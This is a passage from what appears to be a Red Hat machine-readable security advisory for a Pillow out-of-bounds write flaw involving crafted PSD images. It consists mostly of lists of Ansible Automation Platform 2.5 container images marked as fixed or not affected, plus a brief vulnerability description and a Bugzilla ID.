"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
